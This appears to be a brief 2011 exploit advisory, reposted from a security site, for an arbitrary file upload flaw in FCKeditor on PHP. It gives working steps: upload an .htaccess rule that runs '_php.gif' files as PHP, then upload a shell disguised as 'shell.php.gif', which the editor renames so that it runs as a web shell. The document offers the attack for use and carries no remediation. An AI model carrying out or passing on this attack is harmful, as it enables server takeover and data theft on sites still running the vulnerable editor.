FCKeditor Upload Vulnerability Affecting All PHP Versions

Author: Anonymous | Source: compiled by this site | Published: 2011-10-25 7:39:07

[+] Title: FCKeditor all version Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author: sinesafe.cn
[+] Website: WwW.sinesafe.cn
----------------------------------------
1. Create a htaccess file:

code:
    <FilesMatch "_php.gif">
    SetHandler application/x-httpd-php
    </FilesMatch>

2. Now upload this htaccess with FCKeditor.
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
----------------------------------------
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name "shell.php.gif" changes to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now shell is available from server.